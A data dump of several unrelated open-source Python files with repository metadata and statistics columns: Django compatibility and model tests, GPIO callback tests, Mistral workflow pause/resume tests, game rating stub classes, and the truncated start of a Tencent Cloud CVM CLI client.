self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
| 42.996875 | 135 | 0.595101 | 4,279 | 41,277 | 5.516943 | 0.053751 | 0.074342 | 0.040327 | 0.051849 | 0.899437 | 0.88173 | 0.867412 | 0.849451 | 0.828187 | 0.807049 | 0 | 0.005159 | 0.290961 | 41,277 | 959 | 136 | 43.04171 | 0.801449 | 0.013833 | 0 | 0.71167 | 0 | 0 | 0.094028 | 0.002728 | 0 | 0 | 0 | 0 | 0.170481 | 1 | 0.05492 | false | 0.080092 | 0.017162 | 0 | 0.073227 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
bc1003924cb83de10777fd181c8b8eb1ed8bd3f4 | 187 | py | Python | request_token/compat.py | timomeara/django-request-token | cdf549e0d426eefe60e292be5d6cf8f2bc425f43 | [
"MIT"
] | 41 | 2016-07-11T05:01:11.000Z | 2021-10-01T05:28:35.000Z | request_token/compat.py | timomeara/django-request-token | cdf549e0d426eefe60e292be5d6cf8f2bc425f43 | [
"MIT"
] | 39 | 2016-10-20T16:44:15.000Z | 2021-08-09T22:17:00.000Z | request_token/compat.py | timomeara/django-request-token | cdf549e0d426eefe60e292be5d6cf8f2bc425f43 | [
"MIT"
] | 25 | 2016-10-06T23:54:52.000Z | 2021-06-23T14:59:23.000Z | # handle Django 3.0/3.1 JSONField
try:
from django.db.models import JSONField # noqa: F401
except ImportError:
from django.contrib.postgres.fields import JSONField # noqa: F401
| 31.166667 | 70 | 0.748663 | 27 | 187 | 5.185185 | 0.666667 | 0.142857 | 0.271429 | 0.328571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0.171123 | 187 | 5 | 71 | 37.4 | 0.83871 | 0.283422 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cb3ab4ef049d25683e324c36b6e07c76f73981a1 | 1,800 | py | Python | frontdesk/tests/test_models.py | brunousml/inbox | 76e12c2aa33e119901e98c3e0b980951f30f8418 | [
"BSD-2-Clause"
] | 1 | 2019-03-16T05:05:54.000Z | 2019-03-16T05:05:54.000Z | frontdesk/tests/test_models.py | brunousml/inbox | 76e12c2aa33e119901e98c3e0b980951f30f8418 | [
"BSD-2-Clause"
] | null | null | null | frontdesk/tests/test_models.py | brunousml/inbox | 76e12c2aa33e119901e98c3e0b980951f30f8418 | [
"BSD-2-Clause"
] | null | null | null | from django.test import TestCase
from . import modelfactories
class PackageMemberTests(TestCase):
def test_type_guessing_for_xml_members(self):
member = modelfactories.PackageMemberFactory(
name='0004-2730-aem-60-4/0004-2730-aem-60-4-0407.xml')
self.assertEqual('application/xml', member.guess_type())
def test_type_guessing_for_pdf_members(self):
member = modelfactories.PackageMemberFactory(
name='0004-2730-aem-60-4/0004-2730-aem-60-4-0299.pdf')
self.assertEqual('application/pdf', member.guess_type())
def test_type_guessing_for_jpg_members(self):
member = modelfactories.PackageMemberFactory(
name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.jpg')
self.assertEqual('image/jpeg', member.guess_type())
def test_type_guessing_for_jpeg_members(self):
member = modelfactories.PackageMemberFactory(
name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.jpeg')
self.assertEqual('image/jpeg', member.guess_type())
def test_type_guessing_for_tif_members(self):
member = modelfactories.PackageMemberFactory(
name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.tif')
self.assertEqual('image/tiff', member.guess_type())
def test_type_guessing_for_tiff_members(self):
member = modelfactories.PackageMemberFactory(
name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.tiff')
self.assertEqual('image/tiff', member.guess_type())
def test_type_guessing_for_members_without_file_extension(self):
member = modelfactories.PackageMemberFactory(
name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01')
self.assertEqual(None, member.guess_type())
| 41.860465 | 76 | 0.693333 | 233 | 1,800 | 5.167382 | 0.171674 | 0.093023 | 0.127907 | 0.151163 | 0.792359 | 0.774086 | 0.774086 | 0.774086 | 0.712625 | 0.712625 | 0 | 0.130523 | 0.182778 | 1,800 | 42 | 77 | 42.857143 | 0.687967 | 0 | 0 | 0.354839 | 0 | 0.225806 | 0.230684 | 0.191773 | 0 | 0 | 0 | 0 | 0.225806 | 1 | 0.225806 | false | 0 | 0.064516 | 0 | 0.322581 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cb579fcab4a96c2759900adfb247c537ba93a7c8 | 1,713 | py | Python | tests/shared/test_gpio_callbacks.py | HazardDede/pnp | 469ca17254dcca1a4eefe0dc5ac574692a9ab38e | [
"MIT"
] | 4 | 2018-10-07T11:32:00.000Z | 2019-04-23T09:34:23.000Z | tests/shared/test_gpio_callbacks.py | HazardDede/pnp | 469ca17254dcca1a4eefe0dc5ac574692a9ab38e | [
"MIT"
] | null | null | null | tests/shared/test_gpio_callbacks.py | HazardDede/pnp | 469ca17254dcca1a4eefe0dc5ac574692a9ab38e | [
"MIT"
] | 1 | 2019-08-12T19:56:10.000Z | 2019-08-12T19:56:10.000Z | import pnp.shared.gpio as gpio
from pnp.utils import parse_duration_literal
def test_callback_from_str():
res = gpio.Callback.from_str("2")
assert isinstance(res, gpio.RisingCallback)
assert res.gpio_pin == 2
res = gpio.Callback.from_str("2", default=gpio.CONST_FALLING)
assert isinstance(res, gpio.FallingCallback)
assert res.gpio_pin == 2
res = gpio.Callback.from_str("2:rising", default=gpio.CONST_FALLING)
assert isinstance(res, gpio.RisingCallback)
assert res.gpio_pin == 2
res = gpio.Callback.from_str("2:falling", default=gpio.CONST_RISING)
assert isinstance(res, gpio.FallingCallback)
assert res.gpio_pin == 2
res = gpio.Callback.from_str("2:switch", default=gpio.CONST_RISING)
assert isinstance(res, gpio.SwitchCallback)
assert res.gpio_pin == 2
assert res.delay == gpio.SwitchCallback.BOUNCE_DEFAULT
res = gpio.Callback.from_str("2:switch(999)", default=gpio.CONST_RISING)
assert isinstance(res, gpio.SwitchCallback)
assert res.gpio_pin == 2
assert res.delay == 999
try:
gpio.Callback.from_str("2:switch()", default=gpio.CONST_RISING)
except ValueError:
pass
res = gpio.Callback.from_str("2:motion", default=gpio.CONST_RISING)
assert isinstance(res, gpio.MotionCallback)
assert res.gpio_pin == 2
assert res.delay == parse_duration_literal(gpio.MotionCallback.DELAY_DEFAULT)
res = gpio.Callback.from_str("2:motion(2m)", default=gpio.CONST_RISING)
assert isinstance(res, gpio.MotionCallback)
assert res.gpio_pin == 2
assert res.delay == 120
try:
gpio.Callback.from_str("2:motion()", default=gpio.CONST_RISING)
except ValueError:
pass
| 33.588235 | 81 | 0.713368 | 235 | 1,713 | 5.046809 | 0.161702 | 0.141653 | 0.139123 | 0.160202 | 0.851602 | 0.851602 | 0.82715 | 0.730186 | 0.67285 | 0.67285 | 0 | 0.01976 | 0.172796 | 1,713 | 50 | 82 | 34.26 | 0.817219 | 0 | 0 | 0.564103 | 0 | 0 | 0.046702 | 0 | 0 | 0 | 0 | 0 | 0.512821 | 1 | 0.025641 | false | 0.051282 | 0.051282 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
cb5df1abd42594112c7e855f4eed191cf5ddb69e | 10,715 | py | Python | mistral/tests/unit/engine/test_task_pause_resume.py | soda-research/mistral | 550a3de9c2defc7ce26336cb705d9c8d87bbaddd | [
"Apache-2.0"
] | 205 | 2015-06-21T11:51:47.000Z | 2022-03-05T04:00:04.000Z | mistral/tests/unit/engine/test_task_pause_resume.py | soda-research/mistral | 550a3de9c2defc7ce26336cb705d9c8d87bbaddd | [
"Apache-2.0"
] | 21 | 2015-04-14T22:41:53.000Z | 2019-02-20T09:30:10.000Z | mistral/tests/unit/engine/test_task_pause_resume.py | soda-research/mistral | 550a3de9c2defc7ce26336cb705d9c8d87bbaddd | [
"Apache-2.0"
] | 110 | 2015-06-14T03:34:38.000Z | 2021-11-11T12:12:56.000Z | # Copyright 2015 - StackStorm, Inc.
# Copyright 2016 - Brocade Communications Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mistral.db.v2 import api as db_api
from mistral.services import workflows as wf_service
from mistral.tests.unit.engine import base
from mistral.workflow import states
from mistral_lib import actions as ml_actions
class TaskPauseResumeTest(base.EngineTestCase):
def test_pause_resume_action_ex(self):
workflow = """
version: '2.0'
wf:
tasks:
task1:
action: std.async_noop
on-success:
- task2
task2:
action: std.noop
"""
wf_service.create_workflows(workflow)
wf_ex = self.engine.start_workflow('wf')
self.await_workflow_state(wf_ex.id, states.RUNNING)
with db_api.transaction():
wf_execs = db_api.get_workflow_executions()
wf_ex = self._assert_single_item(wf_execs, name='wf')
task_execs = wf_ex.task_executions
task_1_ex = self._assert_single_item(
wf_ex.task_executions,
name='task1'
)
task_1_action_exs = db_api.get_action_executions(
task_execution_id=task_1_ex.id
)
self.assertEqual(states.RUNNING, wf_ex.state)
self.assertEqual(1, len(task_execs))
self.assertEqual(states.RUNNING, task_1_ex.state)
self.assertEqual(1, len(task_1_action_exs))
self.assertEqual(states.RUNNING, task_1_action_exs[0].state)
# Pause the action execution of task 1.
self.engine.on_action_update(task_1_action_exs[0].id, states.PAUSED)
self.await_task_paused(task_1_ex.id)
with db_api.transaction():
wf_ex = db_api.get_workflow_execution(wf_ex.id)
task_execs = wf_ex.task_executions
task_1_ex = self._assert_single_item(
wf_ex.task_executions,
name='task1'
)
task_1_action_exs = db_api.get_action_executions(
task_execution_id=task_1_ex.id
)
self.assertEqual(states.PAUSED, wf_ex.state)
self.assertEqual(1, len(task_execs))
self.assertEqual(states.PAUSED, task_1_ex.state)
self.assertEqual(1, len(task_1_action_exs))
self.assertEqual(states.PAUSED, task_1_action_exs[0].state)
# Resume the action execution of task 1.
self.engine.on_action_update(task_1_action_exs[0].id, states.RUNNING)
self.await_task_running(task_1_ex.id)
with db_api.transaction():
wf_ex = db_api.get_workflow_execution(wf_ex.id)
task_1_ex = self._assert_single_item(
wf_ex.task_executions,
name='task1'
)
task_1_action_exs = db_api.get_action_executions(
task_execution_id=task_1_ex.id
)
self.assertEqual(states.RUNNING, wf_ex.state)
self.assertEqual(1, len(task_execs))
self.assertEqual(states.RUNNING, task_1_ex.state)
self.assertEqual(1, len(task_1_action_exs))
self.assertEqual(states.RUNNING, task_1_action_exs[0].state)
# Complete action execution of task 1.
self.engine.on_action_complete(
task_1_action_exs[0].id,
ml_actions.Result(data={'result': 'foobar'})
)
# Wait for the workflow execution to complete.
self.await_workflow_success(wf_ex.id)
with db_api.transaction():
wf_ex = db_api.get_workflow_execution(wf_ex.id)
task_execs = wf_ex.task_executions
task_1_ex = self._assert_single_item(task_execs, name='task1')
task_1_action_exs = db_api.get_action_executions(
task_execution_id=task_1_ex.id
)
task_2_ex = self._assert_single_item(task_execs, name='task2')
self.assertEqual(states.SUCCESS, wf_ex.state)
self.assertEqual(2, len(task_execs))
self.assertEqual(states.SUCCESS, task_1_ex.state)
self.assertEqual(1, len(task_1_action_exs))
self.assertEqual(states.SUCCESS, task_1_action_exs[0].state)
self.assertEqual(states.SUCCESS, task_2_ex.state)
def test_pause_resume_action_ex_with_items_task(self):
workflow = """
version: '2.0'
wf:
tasks:
task1:
with-items: i in <% range(3) %>
action: std.async_noop
on-success:
- task2
task2:
action: std.noop
"""
wf_service.create_workflows(workflow)
wf_ex = self.engine.start_workflow('wf')
self.await_workflow_state(wf_ex.id, states.RUNNING)
with db_api.transaction():
wf_execs = db_api.get_workflow_executions()
wf_ex = self._assert_single_item(wf_execs, name='wf')
task_execs = wf_ex.task_executions
task_1_ex = self._assert_single_item(
wf_ex.task_executions,
name='task1'
)
task_1_action_exs = sorted(
db_api.get_action_executions(task_execution_id=task_1_ex.id),
key=lambda x: x['runtime_context']['index']
)
self.assertEqual(states.RUNNING, wf_ex.state)
self.assertEqual(1, len(task_execs))
self.assertEqual(states.RUNNING, task_1_ex.state)
self.assertEqual(3, len(task_1_action_exs))
self.assertEqual(states.RUNNING, task_1_action_exs[0].state)
self.assertEqual(states.RUNNING, task_1_action_exs[1].state)
self.assertEqual(states.RUNNING, task_1_action_exs[2].state)
# Pause the 1st action execution of task 1.
self.engine.on_action_update(task_1_action_exs[0].id, states.PAUSED)
self.await_task_paused(task_1_ex.id)
with db_api.transaction():
wf_ex = db_api.get_workflow_execution(wf_ex.id)
task_execs = wf_ex.task_executions
task_1_ex = self._assert_single_item(
wf_ex.task_executions,
name='task1'
)
task_1_action_exs = sorted(
db_api.get_action_executions(task_execution_id=task_1_ex.id),
key=lambda x: x['runtime_context']['index']
)
self.assertEqual(states.PAUSED, wf_ex.state)
self.assertEqual(1, len(task_execs))
self.assertEqual(states.PAUSED, task_1_ex.state)
self.assertEqual(3, len(task_1_action_exs))
self.assertEqual(states.PAUSED, task_1_action_exs[0].state)
self.assertEqual(states.RUNNING, task_1_action_exs[1].state)
self.assertEqual(states.RUNNING, task_1_action_exs[2].state)
# Complete 2nd and 3rd action executions of task 1.
self.engine.on_action_complete(
task_1_action_exs[1].id,
ml_actions.Result(data={'result': 'two'})
)
self.engine.on_action_complete(
task_1_action_exs[2].id,
ml_actions.Result(data={'result': 'three'})
)
with db_api.transaction():
wf_ex = db_api.get_workflow_execution(wf_ex.id)
task_execs = wf_ex.task_executions
task_1_ex = self._assert_single_item(
wf_ex.task_executions,
name='task1'
)
task_1_action_exs = sorted(
db_api.get_action_executions(task_execution_id=task_1_ex.id),
key=lambda x: x['runtime_context']['index']
)
self.assertEqual(states.PAUSED, wf_ex.state)
self.assertEqual(1, len(task_execs))
self.assertEqual(states.PAUSED, task_1_ex.state)
self.assertEqual(3, len(task_1_action_exs))
self.assertEqual(states.PAUSED, task_1_action_exs[0].state)
self.assertEqual(states.SUCCESS, task_1_action_exs[1].state)
self.assertEqual(states.SUCCESS, task_1_action_exs[2].state)
# Resume the 1st action execution of task 1.
self.engine.on_action_update(task_1_action_exs[0].id, states.RUNNING)
self.await_task_running(task_1_ex.id)
with db_api.transaction():
wf_ex = db_api.get_workflow_execution(wf_ex.id)
task_1_ex = self._assert_single_item(
wf_ex.task_executions,
name='task1'
)
task_1_action_exs = sorted(
db_api.get_action_executions(task_execution_id=task_1_ex.id),
key=lambda x: x['runtime_context']['index']
)
self.assertEqual(states.RUNNING, wf_ex.state)
self.assertEqual(1, len(task_execs))
self.assertEqual(states.RUNNING, task_1_ex.state)
self.assertEqual(3, len(task_1_action_exs))
self.assertEqual(states.RUNNING, task_1_action_exs[0].state)
self.assertEqual(states.SUCCESS, task_1_action_exs[1].state)
self.assertEqual(states.SUCCESS, task_1_action_exs[2].state)
# Complete the 1st action execution of task 1.
self.engine.on_action_complete(
task_1_action_exs[0].id,
ml_actions.Result(data={'result': 'foobar'})
)
# Wait for the workflow execution to complete.
self.await_workflow_success(wf_ex.id)
with db_api.transaction():
wf_ex = db_api.get_workflow_execution(wf_ex.id)
task_execs = wf_ex.task_executions
task_1_ex = self._assert_single_item(task_execs, name='task1')
task_1_action_exs = sorted(
db_api.get_action_executions(task_execution_id=task_1_ex.id),
key=lambda x: x['runtime_context']['index']
)
task_2_ex = self._assert_single_item(task_execs, name='task2')
self.assertEqual(states.SUCCESS, wf_ex.state)
self.assertEqual(2, len(task_execs))
self.assertEqual(states.SUCCESS, task_1_ex.state)
self.assertEqual(3, len(task_1_action_exs))
self.assertEqual(states.SUCCESS, task_1_action_exs[0].state)
self.assertEqual(states.SUCCESS, task_1_action_exs[1].state)
self.assertEqual(states.SUCCESS, task_1_action_exs[2].state)
self.assertEqual(states.SUCCESS, task_2_ex.state)
| 34.676375 | 77 | 0.643677 | 1,439 | 10,715 | 4.464906 | 0.101459 | 0.064591 | 0.077043 | 0.098054 | 0.875019 | 0.874708 | 0.85821 | 0.85572 | 0.845447 | 0.831751 | 0 | 0.021775 | 0.262809 | 10,715 | 308 | 78 | 34.788961 | 0.791619 | 0.094914 | 0 | 0.843602 | 0 | 0 | 0.071222 | 0 | 0 | 0 | 0 | 0 | 0.331754 | 1 | 0.009479 | false | 0 | 0.023697 | 0 | 0.037915 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cb7c2cf66ef31ad1b7dbbeeec1251480ef647019 | 6,545 | py | Python | loldib/getratings/models/NA/na_rumble/na_rumble_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_rumble/na_rumble_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_rumble/na_rumble_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Rumble_Sup_Aatrox(Ratings):
pass
class NA_Rumble_Sup_Ahri(Ratings):
pass
class NA_Rumble_Sup_Akali(Ratings):
pass
class NA_Rumble_Sup_Alistar(Ratings):
pass
class NA_Rumble_Sup_Amumu(Ratings):
pass
class NA_Rumble_Sup_Anivia(Ratings):
pass
class NA_Rumble_Sup_Annie(Ratings):
pass
class NA_Rumble_Sup_Ashe(Ratings):
pass
class NA_Rumble_Sup_AurelionSol(Ratings):
pass
class NA_Rumble_Sup_Azir(Ratings):
pass
class NA_Rumble_Sup_Bard(Ratings):
pass
class NA_Rumble_Sup_Blitzcrank(Ratings):
pass
class NA_Rumble_Sup_Brand(Ratings):
pass
class NA_Rumble_Sup_Braum(Ratings):
pass
class NA_Rumble_Sup_Caitlyn(Ratings):
pass
class NA_Rumble_Sup_Camille(Ratings):
pass
class NA_Rumble_Sup_Cassiopeia(Ratings):
pass
class NA_Rumble_Sup_Chogath(Ratings):
pass
class NA_Rumble_Sup_Corki(Ratings):
pass
class NA_Rumble_Sup_Darius(Ratings):
pass
class NA_Rumble_Sup_Diana(Ratings):
pass
class NA_Rumble_Sup_Draven(Ratings):
pass
class NA_Rumble_Sup_DrMundo(Ratings):
pass
class NA_Rumble_Sup_Ekko(Ratings):
pass
class NA_Rumble_Sup_Elise(Ratings):
pass
class NA_Rumble_Sup_Evelynn(Ratings):
pass
class NA_Rumble_Sup_Ezreal(Ratings):
pass
class NA_Rumble_Sup_Fiddlesticks(Ratings):
pass
class NA_Rumble_Sup_Fiora(Ratings):
pass
class NA_Rumble_Sup_Fizz(Ratings):
pass
class NA_Rumble_Sup_Galio(Ratings):
pass
class NA_Rumble_Sup_Gangplank(Ratings):
pass
class NA_Rumble_Sup_Garen(Ratings):
pass
class NA_Rumble_Sup_Gnar(Ratings):
pass
class NA_Rumble_Sup_Gragas(Ratings):
pass
class NA_Rumble_Sup_Graves(Ratings):
pass
class NA_Rumble_Sup_Hecarim(Ratings):
pass
class NA_Rumble_Sup_Heimerdinger(Ratings):
pass
class NA_Rumble_Sup_Illaoi(Ratings):
pass
class NA_Rumble_Sup_Irelia(Ratings):
pass
class NA_Rumble_Sup_Ivern(Ratings):
pass
class NA_Rumble_Sup_Janna(Ratings):
pass
class NA_Rumble_Sup_JarvanIV(Ratings):
pass
class NA_Rumble_Sup_Jax(Ratings):
pass
class NA_Rumble_Sup_Jayce(Ratings):
pass
class NA_Rumble_Sup_Jhin(Ratings):
pass
class NA_Rumble_Sup_Jinx(Ratings):
pass
class NA_Rumble_Sup_Kalista(Ratings):
pass
class NA_Rumble_Sup_Karma(Ratings):
pass
class NA_Rumble_Sup_Karthus(Ratings):
pass
class NA_Rumble_Sup_Kassadin(Ratings):
pass
class NA_Rumble_Sup_Katarina(Ratings):
pass
class NA_Rumble_Sup_Kayle(Ratings):
pass
class NA_Rumble_Sup_Kayn(Ratings):
pass
class NA_Rumble_Sup_Kennen(Ratings):
pass
class NA_Rumble_Sup_Khazix(Ratings):
pass
class NA_Rumble_Sup_Kindred(Ratings):
pass
class NA_Rumble_Sup_Kled(Ratings):
pass
class NA_Rumble_Sup_KogMaw(Ratings):
pass
class NA_Rumble_Sup_Leblanc(Ratings):
pass
class NA_Rumble_Sup_LeeSin(Ratings):
pass
class NA_Rumble_Sup_Leona(Ratings):
pass
class NA_Rumble_Sup_Lissandra(Ratings):
pass
class NA_Rumble_Sup_Lucian(Ratings):
pass
class NA_Rumble_Sup_Lulu(Ratings):
pass
class NA_Rumble_Sup_Lux(Ratings):
pass
class NA_Rumble_Sup_Malphite(Ratings):
pass
class NA_Rumble_Sup_Malzahar(Ratings):
pass
class NA_Rumble_Sup_Maokai(Ratings):
pass
class NA_Rumble_Sup_MasterYi(Ratings):
pass
class NA_Rumble_Sup_MissFortune(Ratings):
pass
class NA_Rumble_Sup_MonkeyKing(Ratings):
pass
class NA_Rumble_Sup_Mordekaiser(Ratings):
pass
class NA_Rumble_Sup_Morgana(Ratings):
pass
class NA_Rumble_Sup_Nami(Ratings):
pass
class NA_Rumble_Sup_Nasus(Ratings):
pass
class NA_Rumble_Sup_Nautilus(Ratings):
pass
class NA_Rumble_Sup_Nidalee(Ratings):
pass
class NA_Rumble_Sup_Nocturne(Ratings):
pass
class NA_Rumble_Sup_Nunu(Ratings):
pass
class NA_Rumble_Sup_Olaf(Ratings):
pass
class NA_Rumble_Sup_Orianna(Ratings):
pass
class NA_Rumble_Sup_Ornn(Ratings):
pass
class NA_Rumble_Sup_Pantheon(Ratings):
pass
class NA_Rumble_Sup_Poppy(Ratings):
pass
class NA_Rumble_Sup_Quinn(Ratings):
pass
class NA_Rumble_Sup_Rakan(Ratings):
pass
class NA_Rumble_Sup_Rammus(Ratings):
pass
class NA_Rumble_Sup_RekSai(Ratings):
pass
class NA_Rumble_Sup_Renekton(Ratings):
pass
class NA_Rumble_Sup_Rengar(Ratings):
pass
class NA_Rumble_Sup_Riven(Ratings):
pass
class NA_Rumble_Sup_Rumble(Ratings):
pass
class NA_Rumble_Sup_Ryze(Ratings):
pass
class NA_Rumble_Sup_Sejuani(Ratings):
pass
class NA_Rumble_Sup_Shaco(Ratings):
pass
class NA_Rumble_Sup_Shen(Ratings):
pass
class NA_Rumble_Sup_Shyvana(Ratings):
pass
class NA_Rumble_Sup_Singed(Ratings):
pass
class NA_Rumble_Sup_Sion(Ratings):
pass
class NA_Rumble_Sup_Sivir(Ratings):
pass
class NA_Rumble_Sup_Skarner(Ratings):
pass
class NA_Rumble_Sup_Sona(Ratings):
pass
class NA_Rumble_Sup_Soraka(Ratings):
pass
class NA_Rumble_Sup_Swain(Ratings):
pass
class NA_Rumble_Sup_Syndra(Ratings):
pass
class NA_Rumble_Sup_TahmKench(Ratings):
pass
class NA_Rumble_Sup_Taliyah(Ratings):
pass
class NA_Rumble_Sup_Talon(Ratings):
pass
class NA_Rumble_Sup_Taric(Ratings):
pass
class NA_Rumble_Sup_Teemo(Ratings):
pass
class NA_Rumble_Sup_Thresh(Ratings):
pass
class NA_Rumble_Sup_Tristana(Ratings):
pass
class NA_Rumble_Sup_Trundle(Ratings):
pass
class NA_Rumble_Sup_Tryndamere(Ratings):
pass
class NA_Rumble_Sup_TwistedFate(Ratings):
pass
class NA_Rumble_Sup_Twitch(Ratings):
pass
class NA_Rumble_Sup_Udyr(Ratings):
pass
class NA_Rumble_Sup_Urgot(Ratings):
pass
class NA_Rumble_Sup_Varus(Ratings):
pass
class NA_Rumble_Sup_Vayne(Ratings):
pass
class NA_Rumble_Sup_Veigar(Ratings):
pass
class NA_Rumble_Sup_Velkoz(Ratings):
pass
class NA_Rumble_Sup_Vi(Ratings):
pass
class NA_Rumble_Sup_Viktor(Ratings):
pass
class NA_Rumble_Sup_Vladimir(Ratings):
pass
class NA_Rumble_Sup_Volibear(Ratings):
pass
class NA_Rumble_Sup_Warwick(Ratings):
pass
class NA_Rumble_Sup_Xayah(Ratings):
pass
class NA_Rumble_Sup_Xerath(Ratings):
pass
class NA_Rumble_Sup_XinZhao(Ratings):
pass
class NA_Rumble_Sup_Yasuo(Ratings):
pass
class NA_Rumble_Sup_Yorick(Ratings):
pass
class NA_Rumble_Sup_Zac(Ratings):
pass
class NA_Rumble_Sup_Zed(Ratings):
pass
class NA_Rumble_Sup_Ziggs(Ratings):
pass
class NA_Rumble_Sup_Zilean(Ratings):
pass
class NA_Rumble_Sup_Zyra(Ratings):
pass
| 15.695444 | 46 | 0.766692 | 972 | 6,545 | 4.736626 | 0.151235 | 0.209818 | 0.389661 | 0.479583 | 0.803432 | 0.803432 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169748 | 6,545 | 416 | 47 | 15.733173 | 0.847258 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
1db1db6f0dcf317d59425158a86e7cf4dd2ec544 | 96,172 | py | Python | tccli/services/cvm/cvm_client.py | bopopescu/tencentcloud-cli-intl-en | e6317252557095dd10018226244e636daa4a3c67 | [
"Apache-2.0"
] | null | null | null | tccli/services/cvm/cvm_client.py | bopopescu/tencentcloud-cli-intl-en | e6317252557095dd10018226244e636daa4a3c67 | [
"Apache-2.0"
] | null | null | null | tccli/services/cvm/cvm_client.py | bopopescu/tencentcloud-cli-intl-en | e6317252557095dd10018226244e636daa4a3c67 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli.nice_command import NiceCommand
import tccli.error_msg as ErrorMsg
import tccli.help_template as HelpTemplate
from tccli import __version__
from tccli.utils import Utils
from tccli.configure import Configure
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.cvm.v20170312 import cvm_client as cvm_client_v20170312
from tencentcloud.cvm.v20170312 import models as models_v20170312
from tccli.services.cvm import v20170312
from tccli.services.cvm.v20170312 import help as v20170312_help
def doDescribeImageQuota(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeImageQuota", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImageQuotaRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeImageQuota(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doStopInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("StopInstances", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
"StopType": argv.get("--StopType"),
"StoppedMode": argv.get("--StoppedMode"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
